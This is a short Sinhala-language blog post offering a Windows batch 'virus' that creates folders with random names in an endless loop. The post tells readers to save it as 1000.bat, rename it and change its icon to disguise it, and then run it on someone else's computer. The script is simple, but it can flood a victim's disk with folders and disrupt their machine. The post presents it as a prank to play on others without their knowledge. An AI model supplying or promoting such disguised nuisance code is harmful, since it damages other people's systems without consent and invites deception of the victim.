එක click එකයි folders 1000 (virus)

අද ගෙනාවෙ පිස්සු හැදෙන වැඩක්..මේක හදලා කාටහරි කරල බලන්න.එක ක්ලික් එකයි ෆෝල්ඩර් 1000 යි.කොහොමද වැඩේ... ඊටපස්සෙ Delete කරන එක තමා තියෙන්නෙ..





මෙන්න code එක යට 


@echo off
:top
md %random%
goto top

ඉස්සල්ලාම මේ කෝඩ් එක නෝට් පෑඩ් එකට පේස්ට් කරලා 1000.bat කියලා සේව් කරන්න.
 දැන් ඒක Rename  කරලා එක icon එක එහෙම වෙනස් කරන්න.
  
දැන් ඔයාගේ computer එකේ නැතිව වෙන කගේ හරි එකක ඔපෙන් කරලා බලන්න 

0 අදහස්: